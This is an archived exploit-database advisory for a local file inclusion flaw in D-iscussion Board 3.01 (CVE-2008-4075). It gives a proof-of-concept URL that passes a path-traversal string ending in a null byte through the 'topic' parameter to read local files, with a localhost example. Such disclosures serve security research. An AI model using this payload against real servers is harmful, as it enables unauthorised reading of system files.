[] NeoSense

D-iscussion Board 3.01 - 'topic' Local File Inclusion

Author: SirGod
type: webapps
platform: php
port: 
date_added: 2008-09-10 
date_updated: 2016-12-22 
verified: 1 
codes: OSVDB-48017;CVE-2008-4075 
tags: 
aliases:  
screenshot_url:  
application_url: 

############################################################################################################
[+] D-iscussion Board 3.01 Local File Inclusion
[+] Discovered By SirGod
[+] MorTal TeaM
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,str0ke
############################################################################################################

Download : http://dino.shiftedphase.com/comp/downloads/forum.zip

[+] Local File Inclusion


   PoC :

     http://[target]/[path]/general/index.php?topic=[LocalFile]%00

   Example :

     http://127.0.0.1/3.01/general/index.php?topic=../../../../autoexec.bat%00

############################################################################################################

# milw0rm.com [2008-09-11]